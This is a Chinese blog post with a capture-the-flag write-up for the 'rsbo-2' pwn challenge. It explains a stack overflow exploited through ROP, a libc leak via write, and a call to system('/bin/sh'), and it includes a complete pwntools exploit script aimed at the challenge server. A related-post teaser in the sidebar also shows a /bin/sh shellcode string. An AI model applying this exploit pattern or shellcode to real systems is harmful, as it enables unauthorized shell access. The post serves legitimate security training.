hackme.inndy.tw rsbo-2

最新推荐文章于 2022-02-06 10:11:28 发布
最新推荐文章于 2022-02-06 10:11:28 发布
阅读量247 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowleopard_bin/article/details/88073666
版权

前置知识

栈溢出

ROP

保护机制

没有金丝雀canary,但开启了栈执行保护,可以利用rop

关键代码

read_80_bytes函数实际上读了0x80字节,已经可以覆盖main返回地址并且还多溢出0x20-8字节,完全够了

而经过调试,需要覆盖108字节的填充字符,接下来才是返回地址

利用思路

1、利用write leak出libc

2、ROP

具体过程

1、先运行一遍程序,返回到start,以便执行过以便write,在内存中留下plt地址

2、调用write,leak出某个函数地址,得到libc基址

3、往bss中先写入/bin/sh

4、调用system

EXP

from pwn import *

#context.log_level='debug'
context.os = "linux"
context.arch = "i386"
debug=0
elf = ELF('./rsbo-2')
if debug:
	cn=process('./rsbo-2')
	libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
	cn=remote('hackme.inndy.tw', 7706)
	libc = ELF('./libc-2.23.so.i386')
s       = lambda data               :cn.send(str(data))
sa      = lambda delim,data         :cn.sendafter(str(delim), str(data)) 
st      = lambda delim,data         :cn.sendthen(str(delim), str(data)) 
sl      = lambda data               :cn.sendline(str(data)) 
sla     = lambda delim,data         :cn.sendlineafter(str(delim), str(data))
r       = lambda numb=4096          :cn.recv(numb)
rl	= lambda 	            :cn.recvline()
ru      = lambda delims             :cn.recvuntil(delims)
irt     = lambda                    :cn.interactive()
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
flag=0x80487d0
start=0x08048490
open=elf.plt['open']
read=elf.plt['read']
write=elf.plt['write']
bss=elf.bss()

pop2_ret = 0x0804879e
pop3_ret = 0x0804879d
#leak libc
pay = "\x00"*108+p32(open)+p32(start)+p32(flag)+p32(0)
#padding+ret_addr+next_ret+parameters
s(pay)
pay='\x00'*108+p32(write)+p32(start)+p32(1)+p32(elf.got['__libc_start_main'])+p32(4)
#padding+ret_addr+next_ret+parameters
s(pay)
libc_base = u32(r(4))-0x18540
success('libc={}'.format(hex(libc_base)))

#get shell
pay='\x00'*108+p32(read)+p32(start)+p32(0)+p32(bss)+p32(8)
#padding+ret_addr+next_ret+parameters
s(pay)
s('/bin/sh\x00')

sys = libc_base+libc.symbols['system']
pay='\x00'*108+p32(sys)+p32(0xdeadbeef)+p32(bss)
#padding+ret_addr+next_ret+parameters
s(pay)
irt()

该程序是32位程序,函数的参数在栈上,因此在ROP时可以直接把参数填到next_ret地址后面。

而如果是64位程序,参数在寄存器上,这时就需要pop_ret这样的gadget来保存参数到寄存器里。

snowleopard_bin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackme.inndy.tw的一些Writeup(5月30更新)
baikeng3674的博客
10-21 2万+
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://hackme.inndy.tw/scoreboard/,上边有一些很好的针对新手的题目,但网上能搜到的Writeup很少,因此开了这篇博文记录一下部分目前解出的题目(主要是pwn和r...
基于OAuth2.O的资源共享机制RSBO (2012年)
05-07
本文针这些问题,提出了一种基于OAuth2.0协议的资源共享机制RSBO(Resource Sharing based OAuth2.0)并对其进行阐述,RSBO利用OAuth2.0协议认证授权的访问令牌原理,为共享资源创建资源令牌,该机制解决了用户信息泄露及...
hackme.inndy.tw的rop题目
10-15
hackme.inndy.tw的rop题目,如果那个网站被墙或者关闭的话可以从这里下载
hackme inndy pwn rsbo writeup
charlie_heng的专栏
01-01 631
因为rsborsbo2是同一题,所以就直接做rsbo2了 首先看看程序 init函数那里用时间和flag生成了一个seed,所以不能预测rand产生的值 然后是读了0x80个byte,这里有一个栈溢出 但是接下来那个for循环就有点棘手了,想了半天想不到,就去看了下别人的wp,发现是送了104个字节的\x00,这里这样做的原因是当修改到v8的值的时候,可以修改为0,这样就跳出for循...
hackme.inddy.tw 逆向之a-maze
snowleopard_bin的博客
02-24 289
按照要求,应该是将map数据文件的数据都读入到qword_601088地址中 直到从数据中读取到的值为0xFFFFFFFF。于是我们到map中看看0XFFFFFFFF在哪里 从0xFB000开始的512字节都是FF,刚好符合1<<9的大小。 简单分析一下,索引下标可以分为两部分:v2和flag,flag占后9位,剩下的就是v2移位后的值。 因此我们可以从最后一个下标开始...
hackme.inndy rsbo2 经验总结
qq_43189757的博客
08-07 291
这题想用retdl-resolve 来解题,可是自己手写的脚本过不了,搜过其他的wp,发现有很多种解法,利用DynELF泄露libc地址, 或利用write直接泄露libc地址(题目给了libc),但是我就是想用栈迁移和retdl-resolve解题,但是搜到的wp几乎都用了roputils工具,这工具我不会用也没搜到什么教程,然后经过一段时间的无能狂怒之后最后决定求人不如求己,自己去看roput...
rsbo-1和rsbo-2的writeup
zszcr的博客
04-22 493
rsdo和rsdo-2writeup 这两道题的文件是一样的,不过一个没要求getshell,一个要求getshll 先说rsdo 防护机制 只开启了堆栈不可执行 题目hint: ROP, open, read 很明显要要用ROP调用执行open()函数打开flag文件 然后用read()函数读取文件 ida反编译代码 ** 它先执行init函数 ,打开“/home/ct...
[BUUCTF-pwn] inndy_rsbo
weixin_52640415的博客
02-06 126
ida也不可全信。题目很简单就是有个溢出。32位no pie直接就write(write)但试了一下不行。用gdb跟一下发现,ida给的buf = ebp -0x60不对,应该是0x68 改为68就解决了 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[80]; // [esp+10h] [ebp-60h] BYREF int v5; // [esp+60h] [ebp-10h] int
rsborsbo2的wp
一个码农的笔记
11-24 1635
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rsborsbo2这两个题目感觉还不错,我把wp分享出来,方便大家学习 rsbo的题目要求是: nc hackme.inndy.tw 7706 Tips: ROP, open, read把rsbo直接拖入ida中 main函数: init函数: 这个程序首先在init函数中读取了flag文件
前端vue项目中接口前后的加密解密
Gaoju_liz的博客
07-28 1738
前端vue项目中接口前后的加密解密 项目需求,对于敏感的数据进项加密! 提到加密首先想到的是crypto-js 本片文章是实际项目中所遇到的,主要采用的是crypto-js AES****RSA 以及qs(不作详细介绍,用兴趣的可以自行百度) crypto-js jsencrypt.js实际使用例子: 在src文件下创建tools文件,在tools文件下创建crytoJs.js 和jsencrypt.js 目录 src/tools/crytoJs.js 目录 src/tools/jsencrypt.js
SAP BW学习资料
09-03
26. RSBO:旧的Infospoke/OpenHub维护T-Code。 27. RSCRM_BAPI:生成查询提取,为分析过程设计器(APD)提供基础。 28. RSCUSTA:维护BW设置,包括系统配置和个性化选项。 29. RSCUSTA2:ODS设置,专门针对操作...
堆溢出个人学习总结
snowleopard_bin的博客
08-01 5206
Unlink ctf wiki中有个地方困扰了我很久: // fd bk if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \ malloc_printerr (check_action, "corrupted double-linked list", P, AV); ...
pwn中堆溢出的几种模式及相应的利用方法小结
snowleopard_bin的博客
08-01 2694
一、fastbin(16Bytes<= size<=64Bytes )    1、覆盖fd , 向任意地址写任意内容(write-anything-anywhere) buf1 = malloc(32)#1 buf2 = malloc(32)#2 free(2) free(1)#first one to be allocated buf1 ...
2018强网杯部分writeup
snowleopard_bin的博客
09-20 2444
0x00 签到题 操作内容: 打开题目就看到flag FLAG值: flag{welcome_to_qwb} 0x01 Welcome 操作内容: |拿到一张图片:               放进Stegsolve中,一点点偏移图片,慢慢发现有字,offset到100时就能清楚看到 得到flag FLAG值: QWB{W3lc0me} 0x02 web签到 操作内容:...
gcc /g++ 编译保护机制选项 makefile
snowleopard_bin的博客
07-07 1892
gcc hello.c -o hello//没有开启FORTIFY保护 gcc -D_FORTIFY_SOURCE=1 -O1 hello.c -o hello //只会在编译的时候检查 gcc -D_FORTIFY_SOURCE=2 -O2 hello.c -o hello // 强检查 没有-O2的话是不会开启检查的,需要在编译的时候加上这个选项 RELRO -z now ...
shellcode
snowleopard_bin的博客
08-10 1533
短shuallcode shellcode='\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05' 64bit local /bin/sh 有时遇到写的字符中不能包含'\x0b'这个字符,因此不能...
IDA7.5 mipsrop插件使用问题
snowleopard_bin的博客
04-01 1231
问题描述 将ida7.0 的miprop插件复制到ida7.5的plugins目录下后,本以为和ida7.0一样可以直接使用,但是在idapython命令行里输入mipsrop.help()的时候报错: NameError: name 'mipsrop' is not defined 但是将环境设置回7.0再使用的时候,并没有出现以上的错误 解决方法 在idapython中先输入以下代码 import mipsrop mipsrop = mipsrop.MIPSROPFinder() 即可继
HITCON Trainging lab13 heapcreator
snowleopard_bin的博客
10-03 1047
记录第一次不看任何writeup自己写出来的pwn题 前置知识: off by one chunk overlapping chunk extend 一开始先看程序打开哪些保护机制 可以改got表,并且有点要注意是没开PIE,这样就不必泄露函数地址计算基址了(如果开了,这题堆上没有存放函数指针的,我也不会泄露。。) 然后分析程序,挖漏洞 首先从建堆函数看数据结构 结构...
glibc-2.29
snowleopard_bin的博客
12-10 964
2019 湖湘杯线下 pwn2 off by one ,可以修改size,形成chunk overlap。 #-*- coding:utf-8 -*- from PwnContext import * try: from IPython import embed as ipy except ImportError: print ('IPython not installed...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值